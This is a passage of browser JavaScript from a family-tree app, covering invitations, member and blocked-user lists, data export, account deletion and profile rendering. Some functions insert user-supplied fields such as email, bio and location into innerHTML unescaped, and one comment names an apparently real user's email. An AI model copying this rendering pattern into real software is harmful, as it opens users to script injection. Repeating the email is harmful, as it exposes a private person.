                        body: updateData
                    });
                }

                // Close modal and show success
                closeModal('edit-profile-modal');

                // Reset selected avatar
                selectedAvatarFile = null;

                // Refresh avatar in header
                console.log('Profile saved, refreshing avatar in header...');
                await loadUserAvatar();

                // Refresh profile view if currently displayed
                if (document.getElementById('profile-view') && !document.getElementById('profile-view').classList.contains('hidden')) {
                    await loadAndRenderProfile();
                }

                alert('Profile updated successfully!');

            } catch (error) {
                console.error("Error saving profile:", error);
                alert("Error saving profile: " + error.message);
            }
        }

        // Handle search form submission
        async function handleSearch(event) {
            event.preventDefault();

            const searchInput = document.getElementById('global-search-input');
            const query = searchInput?.value.trim();

            if (!query) {
                return;
            }

            if (query.length < 3) {
                alert('Please enter at least 3 characters to search');
                return;
            }

            // Show loading state
            navigateToView('search-results-view', { query: query, results: null });

            try {
                const response = await apiFetch(`${API_BASE_URL}/search?q=${encodeURIComponent(query)}`);

                // Update view with results
                navigateToView('search-results-view', { query: query, results: response });

            } catch (error) {
                console.error('Search error:', error);
                alert('Search failed: ' + error.message);
            }
        }

        // Session 2c Task 5: invite link share.
        // On native: system share sheet (WhatsApp / Messages / Email / etc.)
        //   — the primary path since diaspora audience sends invites via
        //   WhatsApp overwhelmingly.
        // On web: Web Share API when available (mobile Chrome/Safari), else
        //   clipboard copy with visual feedback.
        window.copyInviteLink = async function() {
            const linkInput = document.getElementById('invite-link');
            if (!linkInput) return;
            const url = linkInput.value;
            const button = event && event.target;
            const isNativeApp = !!(window.Capacitor && window.Capacitor.isNativePlatform && window.Capacitor.isNativePlatform());

            // Native + Web Share API path — open the system share sheet.
            if ((isNativeApp || (typeof navigator.share === 'function')) && typeof window.nativeShare === 'function') {
                const shared = await window.nativeShare({
                    title: 'Join me on Ebiwawa',
                    text: 'Come see our family story.',
                    url,
                });
                if (shared && button) {
                    const originalText = button.textContent;
                    button.textContent = 'Shared!';
                    button.classList.add('bg-green-600');
                    button.classList.remove('bg-blue-600');
                    setTimeout(() => {
                        button.textContent = originalText;
                        button.classList.remove('bg-green-600');
                        button.classList.add('bg-blue-600');
                    }, 2000);
                }
                return;
            }
            // Legacy clipboard fallback (desktop browsers without Web Share).
            linkInput.select();
            linkInput.setSelectionRange(0, 99999);
            try {
                await navigator.clipboard.writeText(url);
                if (button) {
                    const originalText = button.textContent;
                    button.textContent = 'Copied!';
                    button.classList.add('bg-green-600');
                    button.classList.remove('bg-blue-600');
                    setTimeout(() => {
                        button.textContent = originalText;
                        button.classList.remove('bg-green-600');
                        button.classList.add('bg-blue-600');
                    }, 2000);
                }
            } catch (_) { /* clipboard blocked — fall through */ }
        };

        // Invite family member function
        async function handleSendInvite(event) {
            if (event) {
                event.preventDefault();
                event.stopPropagation();
            }

            // 2026-07-21: debounce the Send button so a double-click can't
            // fire two concurrent POST /invites requests. Prod incident:
            // one user's original invite produced TWO Invitation nodes
            // in Neo4j created within 1ms of each other (ids 24 + 25 for
            // precious.akanni30@gmail.com) — both races through the
            // backend check_query saw no existing invitation, both
            // CREATE'd. Guard-then-disable pattern.
            const submitBtn = document.querySelector('#invite-family-form button[type="submit"]');
            if (submitBtn && submitBtn.disabled) return;

            const errorDiv = document.getElementById('invite-error');
            const successDiv = document.getElementById('invite-success');
            errorDiv.classList.add('hidden');
            successDiv.classList.add('hidden');

            const email = document.getElementById('invite-email').value.trim();
            const relationship = document.getElementById('invite-relationship').value;
            const message = document.getElementById('invite-message').value.trim();

            if (!email) {
                errorDiv.textContent = "Please enter an email address";
                errorDiv.classList.remove('hidden');
                return;
            }

            if (submitBtn) {
                submitBtn.disabled = true;
                submitBtn.dataset.originalLabel = submitBtn.textContent;
                submitBtn.textContent = 'Sending…';
            }

            try {
                const response = await apiFetch(`${API_BASE_URL}/invites`, {
                    method: 'POST',
                    body: {
                        email,
                        relationship,
                        message
                    }
                });

                // Backend now sends the invitation email via Resend
                // (2026-07-07). The response's emailSent flag tells us
                // whether delivery went through. Fall back to "share the
                // link" copy if the send failed so the user isn't stuck.
                const emailWasSent = response && response.emailSent === true;
                const successHeadline = emailWasSent
                    ? `Invitation sent to ${escapeHtml(email)}.`
                    : `Invitation link ready for ${escapeHtml(email)}.`;
                const successBody = emailWasSent
                    ? `<p class="text-xs mb-3 text-gray-600">Ask them to check their inbox (and spam folder just in case). The link is also below if you want to share it another way — text, WhatsApp, whatever's easiest. Good for 30 days.</p>`
                    : `<p class="text-xs mb-3 text-gray-600">We couldn't send the email automatically — share this link with them directly (text, email, WhatsApp). Good for 30 days.</p>`;
                successDiv.innerHTML = `
                    <div class="text-left">
                        <p class="font-semibold mb-2">${successHeadline}</p>
                        ${successBody}
                        <div class="flex gap-2">
                            <input type="text" id="invite-link" value="${escapeHtml(response.inviteUrl)}" readonly
                                class="flex-1 px-2 py-1 text-xs border border-gray-300 rounded bg-gray-50">
                            <button onclick="copyInviteLink()" class="px-3 py-1 text-xs bg-blue-600 text-white rounded hover:bg-blue-700">
                                Copy
                            </button>
                        </div>
                    </div>
                `;
                successDiv.classList.remove('hidden');

                // Session 2c Task 3: haptic punctuation on invite-complete.
                if (typeof window.nativeHapticTap === 'function') window.nativeHapticTap();

                // Hide form fields and submit button, show only success message.
                // Re-label the remaining "Cancel" button to "Done" since the
                // invitation has been minted — closing the modal won't undo it.
                const formFields = document.getElementById('invite-form-fields');
                const submitButton = document.querySelector('#invite-family-form button[type="submit"]');
                const cancelButton = document.querySelector('#invite-family-form button[type="button"]');
                const subtitle = document.getElementById('invite-family-subtitle');
                if (formFields) formFields.style.display = 'none';
                if (submitButton) submitButton.style.display = 'none';
                if (cancelButton) {
                    cancelButton.textContent = 'Done';
                    cancelButton.className = 'px-6 py-2 font-semibold text-white rounded-md bg-primary hover:bg-primary-dark';
                }
                if (subtitle) {
                    subtitle.textContent = emailWasSent
                        ? 'Your invitation is on its way. The link is also below if you want to share it another way.'
                        : 'Your invitation link is ready. Copy it and share with your family member directly — they need this link to sign up.';
                }

                // Reset form
                document.getElementById('invite-family-form').reset();

                // 2026-07-21: refresh the members/invitations lists in the
                // background so the new invite appears in Pending Invitations
                // without a manual reload. Guard on currentView === 'members-view'
                // so the refresh is a no-op when the modal was opened from
                // somewhere else (Feed FAB, header quick-invite, etc.) —
                // fetchAndRenderMembers writes into DOM elements that only
                // exist on the Family & Connections view. Fire-and-forget so
                // modal-close animation isn't blocked. The prior version had
                // this refresh disabled with a "navigation issues" comment;
                // fetchAndRenderMembers only does targeted innerHTML writes
                // (no renderApp / navigateToView), so no nav concern.
                if (appState.currentView === 'members-view') {
                    fetchAndRenderMembers().catch(err => {
                        console.warn('post-invite members refresh failed:', err);
                    });
                }

            } catch (error) {
                console.error("[handleSendInvite] Error sending invite:", error);
                errorDiv.textContent = error.message || "Failed to send invitation";
                errorDiv.classList.remove('hidden');
                // Re-enable Send on error so the user can retry (fix a typo,
                // etc.). On success we intentionally leave it disabled — the
                // success branch hides the whole submit button and re-labels
                // Cancel to Done.
                if (submitBtn) {
                    submitBtn.disabled = false;
                    if (submitBtn.dataset.originalLabel) {
                        submitBtn.textContent = submitBtn.dataset.originalLabel;
                        delete submitBtn.dataset.originalLabel;
                    }
                }
            }

            return false; // Extra safeguard to prevent form submission
        }

        async function fetchAndRenderMembers() {
            try {
                // Ensure tree is loaded first
                if (!appState.currentTreeId) {
                    console.log('No tree selected, loading tree ID...');
                    // Fetch user's trees to get the tree ID
                    const myTrees = await apiFetch(`${API_BASE_URL}/users/${appState.currentUserNeo4jId}/trees`);
                    if (myTrees && myTrees.length > 0) {
                        // Prefer the tree where the user is the creator
                        const myOwnTree = myTrees.find(t => t.role === 'creator');
                        appState.currentTreeId = myOwnTree ? myOwnTree.tree.id : myTrees[0].tree.id;
                    }
                }

                if (!appState.currentTreeId) {
                    document.getElementById('members-table-body').innerHTML =
                        '<tr><td colspan="4" class="px-6 py-8 text-center text-gray-500">Please create or select a family tree first</td></tr>';
                    document.getElementById('invites-table-body').innerHTML =
                        '<tr><td colspan="5" class="px-6 py-8 text-center text-gray-500">No tree selected</td></tr>';
                    const _mCards = document.getElementById('members-cards-mobile');
                    if (_mCards) _mCards.innerHTML = '<p class="text-center text-gray-500 py-8">Please create or select a family tree first</p>';
                    const _iCards = document.getElementById('invites-cards-mobile');
                    if (_iCards) _iCards.innerHTML = '<p class="text-center text-gray-500 py-8">No tree selected</p>';
                    return;
                }

                // Fetch tree members (returns array of {user: {...}, role: "..."})
                const membersData = await apiFetch(`${API_BASE_URL}/trees/${appState.currentTreeId}/users`);

                // Filter out the current user from the members list
                const otherMembers = membersData.filter(m => m.user.id !== appState.currentUserNeo4jId);

                // Fetch pending invites (returns {invites: [...]})
                const invitesResponse = await apiFetch(`${API_BASE_URL}/invites`);
                const invites = invitesResponse.invites || [];

                // Update stats (use all members for total count, but exclude current user from display)
                const activeCount = otherMembers.length;
                const adminCount = membersData.filter(m => m.role === 'creator' || m.role === 'admin').length;
                const pendingCount = invites.filter(i => i.status === 'pending').length;

                document.getElementById('active-members-count').textContent = activeCount;
                document.getElementById('admin-count').textContent = adminCount;
                document.getElementById('pending-invites-count').textContent = pendingCount;

                // Render members: table for md+, stacked cards for mobile.
                // Both populated from the same otherMembers list.
                const membersTableBody = document.getElementById('members-table-body');
                const membersCardsMobile = document.getElementById('members-cards-mobile');
                if (otherMembers.length === 0) {
                    membersTableBody.innerHTML = '<tr><td colspan="4" class="px-6 py-8 text-center text-gray-500">No other members in this family tree</td></tr>';
                    if (membersCardsMobile) membersCardsMobile.innerHTML = '<p class="text-center text-gray-500 py-8">No other members in this family tree</p>';
                } else {
                    // Mobile card render — same fields as table rows, stacked
                    // with 44px+ touch targets for actions. Kept inline vs.
                    // extracting a component fn since the data shape is
                    // Members-page-specific (User + role, not Person).
                    if (membersCardsMobile) {
                        membersCardsMobile.innerHTML = otherMembers.map(memberData => {
                            const user = memberData.user;
                            const role = memberData.role;
                            const roleBadgeColor = role === 'creator' ? 'bg-purple-100 text-purple-800' :
                                                  role === 'admin' ? 'bg-blue-100 text-blue-800' :
                                                  role === 'editor' ? 'bg-green-100 text-green-800' :
                                                  'bg-gray-100 text-gray-800';
                            const joinedDate = user.createdAt ? new Date(user.createdAt).toLocaleDateString() : 'N/A';
                            const userName = user.name || user.email || 'Unknown User';
                            const userEmail = user.email || '';
                            const userId = user.id;
                            const userInitial = userName.charAt(0).toUpperCase();
                            const hasAvatar = user.avatar || user.avatarUrl || user.avatarSignedUrl || user.avatarGcsPath;
                            const roleLabel = role ? role.charAt(0).toUpperCase() + role.slice(1) : 'Member';
                            return `
                                <div class="bg-white rounded-lg border border-gray-200 p-4">
                                    <div class="flex items-start gap-3 mb-3">
                                        <div class="w-12 h-12 rounded-full bg-primary bg-opacity-20 flex items-center justify-center text-primary font-semibold overflow-hidden flex-shrink-0 ${hasAvatar ? '' : 'border border-primary border-opacity-30'}">
                                            ${hasAvatar && user.avatarSignedUrl
                                                ? `<img src="${user.avatarSignedUrl}" class="w-full h-full object-cover" alt="${escapeHtml(userName)}" onerror="_imgFallback(this, 'avatar', {initials: '${userInitial.replace(/'/g, "\'")}'})">`
                                                : userInitial
                                            }
                                        </div>
                                        <div class="flex-1 min-w-0">
                                            <div class="font-medium text-gray-900 truncate">${escapeHtml(userName)}</div>
                                            ${userEmail ? `<div class="text-sm text-gray-500 truncate">${escapeHtml(userEmail)}</div>` : ''}
                                        </div>
                                        <span class="px-2 py-1 text-xs font-semibold rounded-full flex-shrink-0 ${roleBadgeColor}">${roleLabel}</span>
                                    </div>
                                    <div class="text-xs text-gray-500 mb-3">Joined ${joinedDate}</div>
                                    ${role !== 'creator' ? `
                                        <div class="flex flex-wrap gap-2">
                                            <button onclick="changeRole(${userId}, '${role}')" class="flex-1 min-w-[100px] min-h-[44px] px-3 py-2 text-sm font-medium text-primary bg-gray-100 rounded-md hover:bg-gray-200">Change Role</button>
                                            <button onclick="removeMember(${userId}, '${userEmail.replace(/'/g, "\\'")}')" class="flex-1 min-w-[100px] min-h-[44px] px-3 py-2 text-sm font-medium text-gray-700 bg-gray-100 rounded-md hover:bg-gray-200">Remove</button>
                                            <button onclick="blockUser(${userId}, '${userEmail.replace(/'/g, "\\'")}')" class="flex-1 min-w-[100px] min-h-[44px] px-3 py-2 text-sm font-medium text-red-600 bg-red-50 rounded-md hover:bg-red-100">Block</button>
                                        </div>
                                    ` : '<div class="text-sm text-gray-400 italic">Tree owner</div>'}
                                </div>
                            `;
                        }).join('');
                    }
                    membersTableBody.innerHTML = otherMembers.map(memberData => {
                        const user = memberData.user;
                        const role = memberData.role;

                        const roleBadgeColor = role === 'creator' ? 'bg-purple-100 text-purple-800' :
                                              role === 'admin' ? 'bg-blue-100 text-blue-800' :
                                              role === 'editor' ? 'bg-green-100 text-green-800' :
                                              'bg-gray-100 text-gray-800';

                        const joinedDate = user.createdAt ? new Date(user.createdAt).toLocaleDateString() : 'N/A';
                        // Display order: name > email > fallback. Previously
                        // email was preferred which buried real names behind
                        // gmail addresses. Email becomes the subline (see below).
                        const userName = user.name || user.email || 'Unknown User';
                        const userEmail = user.email || '';
                        const userId = user.id;
                        const userInitial = userName.charAt(0).toUpperCase();

                        // Check if user has an avatar
                        const hasAvatar = user.avatar || user.avatarUrl || user.avatarSignedUrl || user.avatarGcsPath;

                        return `
                            <tr class="hover:bg-gray-50">
                                <td class="px-6 py-4">
                                    <div class="flex items-center">
                                        <div class="w-10 h-10 rounded-full bg-primary bg-opacity-20 flex items-center justify-center text-primary font-semibold mr-3 overflow-hidden ${hasAvatar ? '' : 'border border-primary border-opacity-30'}" data-user-id="${userId}">
                                            ${hasAvatar && user.avatarSignedUrl
                                                ? `<img src="${user.avatarSignedUrl}" class="w-full h-full object-cover" alt="${escapeHtml(userName)}" onerror="_imgFallback(this, 'avatar', {initials: '${userInitial.replace(/'/g, "\'")}'})">`
                                                : userInitial
                                            }
                                        </div>
                                        <div>
                                            <div class="font-medium text-gray-900">${escapeHtml(userName)}</div>
                                            ${userEmail ? `<div class="text-sm text-gray-500">${escapeHtml(userEmail)}</div>` : ''}
                                        </div>
                                    </div>
                                </td>
                                <td class="px-6 py-4">
                                    <span class="px-2 py-1 text-xs font-semibold rounded-full ${roleBadgeColor}">
                                        ${role ? role.charAt(0).toUpperCase() + role.slice(1) : 'Member'}
                                    </span>
                                </td>
                                <td class="px-6 py-4 text-sm text-gray-500">${joinedDate}</td>
                                <td class="px-6 py-4 text-sm">
                                    ${role !== 'creator' ? `
                                        <button onclick="changeRole(${userId}, '${role}')" class="text-primary hover:underline mr-3">
                                            Change Role
                                        </button>
                                        <div class="relative inline-block">
                                            <button onclick="toggleMemberActions(${userId})" class="text-red-600 hover:text-red-800 font-medium inline-flex items-center">
                                                Actions
                                                ${tablerIcon('chevron-down', { size: 16, preserveColor: true })}
                                            </button>
                                            <div id="member-actions-${userId}" class="hidden absolute right-0 mt-2 w-48 bg-white rounded-md shadow-lg z-10 border border-gray-200">
                                                <button onclick="removeMember(${userId}, '${userEmail.replace(/'/g, "\\'")}'); toggleMemberActions(${userId})" class="block w-full text-left px-4 py-2 text-sm text-gray-700 hover:bg-gray-100">
                                                    Remove Connection
                                                </button>
                                                <button onclick="blockUser(${userId}, '${userEmail.replace(/'/g, "\\'")}'); toggleMemberActions(${userId})" class="block w-full text-left px-4 py-2 text-sm text-red-600 hover:bg-red-50">
                                                    Block User
                                                </button>
                                            </div>
                                        </div>
                                    ` : '<span class="text-gray-400">Owner</span>'}
                                </td>
                            </tr>
                        `;
                    }).join('');
                }

                // Render invites: table for md+, cards for mobile.
                const invitesTableBody = document.getElementById('invites-table-body');
                const invitesCardsMobile = document.getElementById('invites-cards-mobile');
                const pendingInvites = invites.filter(i => i.status === 'pending');

                if (pendingInvites.length === 0) {
                    invitesTableBody.innerHTML = '<tr><td colspan="5" class="px-6 py-8 text-center text-gray-500">No pending invitations</td></tr>';
                    if (invitesCardsMobile) invitesCardsMobile.innerHTML = '<p class="text-center text-gray-500 py-8">No pending invitations</p>';
                } else {
                    if (invitesCardsMobile) {
                        invitesCardsMobile.innerHTML = pendingInvites.map(invite => {
                            const invitedDate = invite.createdAt ? new Date(invite.createdAt).toLocaleDateString() : 'N/A';
                            const relationship = invite.relationship || 'N/A';
                            const emailEscaped = invite.email.replace(/'/g, "\\'");
                            return `
                                <div class="bg-white rounded-lg border border-gray-200 p-4">
                                    <div class="flex items-start justify-between gap-3 mb-3">
                                        <div class="flex-1 min-w-0">
                                            <div class="font-medium text-gray-900 truncate">${escapeHtml(invite.email)}</div>
                                            <div class="text-sm text-gray-500 mt-1">${escapeHtml(relationship)} · Invited ${invitedDate}</div>
                                        </div>
                                        <span class="px-2 py-1 text-xs font-semibold text-yellow-800 bg-yellow-100 rounded-full flex-shrink-0">Pending</span>
                                    </div>
                                    <div class="flex flex-wrap gap-2">
                                        <button onclick="resendInvite('${emailEscaped}')" class="flex-1 min-w-[100px] min-h-[44px] px-3 py-2 text-sm font-medium text-primary bg-gray-100 rounded-md hover:bg-gray-200">Resend</button>
                                        <button onclick="cancelInvite('${emailEscaped}')" class="flex-1 min-w-[100px] min-h-[44px] px-3 py-2 text-sm font-medium text-red-600 bg-red-50 rounded-md hover:bg-red-100">Cancel</button>
                                    </div>
                                </div>
                            `;
                        }).join('');
                    }
                    invitesTableBody.innerHTML = pendingInvites.map(invite => {
                        const invitedDate = invite.createdAt ? new Date(invite.createdAt).toLocaleDateString() : 'N/A';

                        return `
                            <tr class="hover:bg-gray-50">
                                <td class="px-6 py-4 text-sm text-gray-900">${invite.email}</td>
                                <td class="px-6 py-4 text-sm text-gray-500">${invite.relationship || 'N/A'}</td>
                                <td class="px-6 py-4 text-sm text-gray-500">${invitedDate}</td>
                                <td class="px-6 py-4">
                                    <span class="px-2 py-1 text-xs font-semibold text-yellow-800 bg-yellow-100 rounded-full">
                                        Pending
                                    </span>
                                </td>
                                <td class="px-6 py-4 text-sm">
                                    <button onclick="resendInvite('${invite.email}')" class="text-primary hover:underline mr-3">
                                        Resend
                                    </button>
                                    <button onclick="cancelInvite('${invite.id}')" class="text-red-600 hover:text-red-800">
                                        Cancel
                                    </button>
                                </td>
                            </tr>
                        `;
                    }).join('');
                }

                // Render blocked users table
                const blockedUsersTableBody = document.getElementById('blocked-users-table-body');
                try {
                    const blockedUsersResponse = await apiFetch(`${API_BASE_URL}/blocked-users`);
                    const blockedUsers = blockedUsersResponse.blockedUsers || [];

                    if (blockedUsers.length === 0) {
                        blockedUsersTableBody.innerHTML = '<tr><td colspan="4" class="px-6 py-8 text-center text-gray-500">No blocked users</td></tr>';
                    } else {
                        blockedUsersTableBody.innerHTML = blockedUsers.map(user => {
                            const blockedDate = user.blockedAt ? new Date(user.blockedAt).toLocaleDateString() : 'N/A';
                            const userName = user.name || user.email || 'Unknown User';

                            return `
                                <tr class="hover:bg-gray-50">
                                    <td class="px-6 py-4 text-sm text-gray-900">${escapeHtml(userName)}</td>
                                    <td class="px-6 py-4 text-sm text-gray-500">${user.email || 'N/A'}</td>
                                    <td class="px-6 py-4 text-sm text-gray-500">${blockedDate}</td>
                                    <td class="px-6 py-4 text-sm">
                                        <button onclick="unblockUser(${user.userId}, '${userName.replace(/'/g, "\\'")}');" class="text-primary hover:underline">
                                            Unblock
                                        </button>
                                    </td>
                                </tr>
                            `;
                        }).join('');
                    }
                } catch (blockedError) {
                    console.error("Error loading blocked users:", blockedError);
                    blockedUsersTableBody.innerHTML =
                        `<tr><td colspan="4" class="px-6 py-8 text-center text-gray-500">Error loading blocked users</td></tr>`;
                }

            } catch (error) {
                console.error("Error loading members:", error);
                document.getElementById('members-table-body').innerHTML =
                    `<tr><td colspan="4" class="px-6 py-8 text-center text-error">Error loading members: ${error.message}</td></tr>`;
                document.getElementById('invites-table-body').innerHTML =
                    `<tr><td colspan="5" class="px-6 py-8 text-center text-error">Error loading invitations: ${error.message}</td></tr>`;
                const _mCardsErr = document.getElementById('members-cards-mobile');
                if (_mCardsErr) _mCardsErr.innerHTML = `<p class="text-center text-error py-8">Error loading members: ${escapeHtml(error.message)}</p>`;
                const _iCardsErr = document.getElementById('invites-cards-mobile');
                if (_iCardsErr) _iCardsErr.innerHTML = `<p class="text-center text-error py-8">Error loading invitations: ${escapeHtml(error.message)}</p>`;
                document.getElementById('blocked-users-table-body').innerHTML =
                    `<tr><td colspan="4" class="px-6 py-8 text-center text-error">Error loading data: ${error.message}</td></tr>`;
            }
        }

        // ---- GDPR (Privacy & Data) ----

        async function downloadMyData() {
            const btn = document.getElementById('download-data-btn');
            if (btn) { btn.disabled = true; btn.textContent = 'Preparing…'; }
            try {
                const data = await apiFetch(`${API_BASE_URL}/me/export`, { method: 'GET' });
                const blob = new Blob([JSON.stringify(data, null, 2)], { type: 'application/json' });
                const url = URL.createObjectURL(blob);
                const a = document.createElement('a');
                a.href = url;
                const stamp = new Date().toISOString().replace(/[:.]/g, '-').slice(0, 19);
                a.download = `ebiwawa-export-${stamp}.json`;
                document.body.appendChild(a);
                a.click();
                document.body.removeChild(a);
                URL.revokeObjectURL(url);
            } catch (error) {
                console.error('Export failed:', error);
                alert('Could not download your data: ' + (error.message || 'unknown error'));
            } finally {
                if (btn) { btn.disabled = false; btn.textContent = 'Download'; }
            }
        }

        function openDeleteAccountModal() {
            const modal = document.getElementById('delete-account-modal');
            const input = document.getElementById('delete-confirm-input');
            const err = document.getElementById('delete-error');
            const btn = document.getElementById('delete-confirm-btn');
            if (!modal) return;
            if (input) input.value = '';
            if (err) { err.textContent = ''; err.classList.add('hidden'); }
            if (btn) btn.disabled = true;
            modal.classList.remove('opacity-0', 'pointer-events-none');
            modal.classList.add('opacity-100');
            if (input) setTimeout(() => input.focus(), 50);
        }

        function closeDeleteAccountModal() {
            const modal = document.getElementById('delete-account-modal');
            if (!modal) return;
            modal.classList.add('opacity-0', 'pointer-events-none');
            modal.classList.remove('opacity-100');
        }

        function updateDeleteConfirmState() {
            const input = document.getElementById('delete-confirm-input');
            const btn = document.getElementById('delete-confirm-btn');
            if (!input || !btn) return;
            btn.disabled = (input.value.trim() !== 'DELETE');
        }

        async function submitDeleteAccount() {
            const btn = document.getElementById('delete-confirm-btn');
            const err = document.getElementById('delete-error');
            if (btn) { btn.disabled = true; btn.textContent = 'Deleting…'; }
            if (err) { err.textContent = ''; err.classList.add('hidden'); }
            try {
                await apiFetch(`${API_BASE_URL}/me/delete`, {
                    method: 'POST',
                    body: { confirm: 'DELETE' },
                });
                // Firebase Auth user is gone server-side; force a clean sign-out client-side.
                try { await signOut(auth); } catch (e) { /* ignore */ }
                alert('Your account has been deleted. You will now be signed out.');
                window.location.href = '/';
            } catch (error) {
                console.error('Delete failed:', error);
                if (err) {
                    err.textContent = 'Could not delete account: ' + (error.message || 'unknown error');
                    err.classList.remove('hidden');
                }
                if (btn) { btn.disabled = false; btn.textContent = 'Delete account'; }
            }
        }

        async function loadAndRenderProfile() {
            const loadingDiv = document.getElementById('profile-loading');
            const contentDiv = document.getElementById('profile-content');

            if (!loadingDiv || !contentDiv) return;

            // Show loading
            loadingDiv.classList.remove('hidden');
            contentDiv.classList.add('hidden');

            try {
                // Fetch user data from /me endpoint. Cache-bust so the
                // post-save refresh actually shows the just-written values
                // (browser HTTP cache otherwise served the pre-save snapshot).
                const response = await apiFetch(`${API_BASE_URL}/me?_=${Date.now()}`);
                const userData = response.user || response;

                // Build full name from firstName/lastName if available
                const nameParts = [userData.firstName, userData.middleName, userData.lastName].filter(n => n);
                const fullName = nameParts.length > 0
                    ? nameParts.join(' ') + (userData.suffix ? ' ' + userData.suffix : '')
                    : userData.name || 'User';

                // Build profile HTML
                const profileHtml = `
                    <div class="p-6">
                        <!-- Avatar Section -->
                        <div class="flex items-center gap-6 pb-6 border-b border-gray-200">
                            <div class="w-24 h-24 rounded-full bg-primary bg-opacity-20 flex items-center justify-center text-primary font-bold text-3xl overflow-hidden">
                                ${userData.avatarSignedUrl
                                    ? `<img src="${userData.avatarSignedUrl}" class="w-full h-full object-cover" alt="Profile">`
                                    : fullName.charAt(0).toUpperCase()
                                }
                            </div>
                            <div>
                                <h3 class="text-2xl font-bold text-gray-900">${fullName}</h3>
                                <p class="text-gray-600 mt-1">${userData.email || ''}</p>
                            </div>
                        </div>

                        <!-- Personal Information -->
                        <div class="py-6 border-b border-gray-200">
                            <h4 class="text-lg font-semibold text-gray-900 mb-4">Personal Information</h4>
                            <div class="grid grid-cols-1 md:grid-cols-2 gap-4">
                                ${userData.birthYear ? `
                                    <div>
                                        <p class="text-sm text-gray-600">Date of Birth</p>
                                        <p class="text-base text-gray-900">${[userData.birthMonth, userData.birthDay, userData.birthYear].filter(Boolean).join('/')}</p>
                                    </div>
                                ` : ''}
                                ${userData.occupation ? `
                                    <div>
                                        <p class="text-sm text-gray-600">Occupation</p>
                                        <p class="text-base text-gray-900">${userData.occupation}</p>
                                    </div>
                                ` : ''}
                            </div>
                        </div>

                        <!-- Location Information -->
                        ${userData.birthPlace || userData.currentLocation || userData.hometown ? `
                            <div class="py-6 border-b border-gray-200">
                                <h4 class="text-lg font-semibold text-gray-900 mb-4">Location</h4>
                                <div class="grid grid-cols-1 md:grid-cols-2 gap-4">
                                    ${userData.birthPlace ? `
                                        <div>
                                            <p class="text-sm text-gray-600">Place of Birth</p>
                                            <p class="text-base text-gray-900">${userData.birthPlace}</p>
                                        </div>
                                    ` : ''}
                                    ${userData.currentLocation ? `
                                        <div>
                                            <p class="text-sm text-gray-600">Current Location</p>
                                            <p class="text-base text-gray-900">${userData.currentLocation}</p>
                                        </div>
                                    ` : ''}
                                    ${userData.hometown ? `
                                        <div>
                                            <p class="text-sm text-gray-600">Hometown</p>
                                            <p class="text-base text-gray-900">${userData.hometown}</p>
                                        </div>
                                    ` : ''}
                                </div>
                            </div>
                        ` : ''}

                        <!-- Heritage & Culture -->
                        ${userData.ethnicGroup || userData.tribe || userData.languages ? `
                            <div class="py-6 border-b border-gray-200">
                                <h4 class="text-lg font-semibold text-gray-900 mb-4">Heritage & Culture</h4>
                                <div class="grid grid-cols-1 md:grid-cols-2 gap-4">
                                    ${userData.ethnicGroup ? `
                                        <div>
                                            <p class="text-sm text-gray-600">Ethnic Group(s)</p>
                                            <p class="text-base text-gray-900">${userData.ethnicGroup}</p>
                                        </div>
                                    ` : ''}
                                    ${userData.tribe ? `
                                        <div>
                                            <p class="text-sm text-gray-600">Tribal Affiliation</p>
                                            <p class="text-base text-gray-900">${userData.tribe}</p>
                                        </div>
                                    ` : ''}
                                    ${userData.languages ? `
                                        <div>
                                            <p class="text-sm text-gray-600">Languages</p>
                                            <p class="text-base text-gray-900">${userData.languages}</p>
                                        </div>
                                    ` : ''}
                                </div>
                            </div>
                        ` : ''}

                        <!-- About/Biography -->
                        ${userData.bio ? `
                            <div class="py-6">
                                <h4 class="text-lg font-semibold text-gray-900 mb-4">About</h4>
                                <p class="text-base text-gray-700 whitespace-pre-wrap">${userData.bio}</p>
                            </div>
                        ` : ''}
                    </div>
                `;

                contentDiv.innerHTML = profileHtml;
                loadingDiv.classList.add('hidden');
                contentDiv.classList.remove('hidden');

                // Phase 3: render Manage Privacy row on the profile page. Only
                // visible for users who have claimed a Person — until then, they
                // have no Person to make private or visible.
                renderManagePrivacyRow(userData);

            } catch (error) {
                console.error('Error loading profile:', error);
                contentDiv.innerHTML = `
                    <div class="p-8 text-center text-error">
                        <p>Error loading profile: ${error.message}</p>
                    </div>
                `;
                loadingDiv.classList.add('hidden');
                contentDiv.classList.remove('hidden');
            }
        }

        function renderManagePrivacyRow(userData) {
            const slot = document.getElementById('manage-privacy-slot');
            if (!slot) return;
            const personId = userData && userData.claimedPersonId;
            if (!personId) {
                // No claimed Person — hide the row entirely. When they later
                // claim (Phase 4) or complete onboarding, /me will surface the
                // id and the next profile render will show the toggle.
                slot.innerHTML = '';
                return;
            }
            const mode = (userData.claimedPersonPrivacyMode === 'private') ? 'private' : 'visible';
            const isPrivate = mode === 'private';
            const stateLabel = isPrivate ? 'Private' : 'Visible to family';
            const stateHint = isPrivate
                ? 'Other members see only your name and how you\'re related.'
                : 'Other members can see your dates, location, and photos.';
            slot.innerHTML = `
                <div class="bg-white rounded-lg shadow-md border border-gray-200 mt-6 p-6" data-privacy-person-id="${personId}">
                    <h3 class="text-lg font-semibold mb-2">Manage privacy${ebwInfoGlyph('settings-privacy', "Visible: other members see your dates, location, photo. Private: only your name and how you're related.")}</h3>
                    <p class="text-sm text-gray-600 mb-5">
                        Controls who can see your profile inside your family tree. You can change this anytime.
                    </p>
                    <div class="flex flex-col sm:flex-row sm:items-center sm:justify-between gap-3 p-4 border border-gray-200 rounded-lg">
                        <div class="flex-1">
                            <div class="flex items-center gap-2">
                                <span
                                    id="manage-privacy-state-label"
                                    class="ebw-privacy-pill ${isPrivate ? 'ebw-privacy-pill-private' : 'ebw-privacy-pill-visible'}"
                                >${stateLabel}</span>
                                <span id="manage-privacy-saved" class="ebw-privacy-saved" aria-live="polite"></span>
                            </div>
                            <div class="text-sm text-gray-500 mt-2" id="manage-privacy-state-hint">${escapeHtml(stateHint)}</div>
                        </div>
                        <label class="inline-flex items-center gap-2 cursor-pointer" title="Toggle profile privacy">
                            <span class="text-sm text-gray-600">Private</span>
                            <input
                                id="manage-privacy-toggle"
                                type="checkbox"
                                ${isPrivate ? 'checked' : ''}
                                onchange="handleManagePrivacyToggle(this)"
                                class="w-5 h-5"
                            />
                        </label>
                    </div>
                    <div id="manage-privacy-error" class="text-sm text-red-600 mt-3 hidden"></div>
                </div>
            `;
        }

        function renderDeceasedPrivacyCard(person) {
            const isPrivate = person && person.privacy_mode === 'private';
            const stateLabel = isPrivate ? 'Private' : 'Visible to family';
            const stateHint = isPrivate
                ? 'Family members see only their name and how they\'re related.'
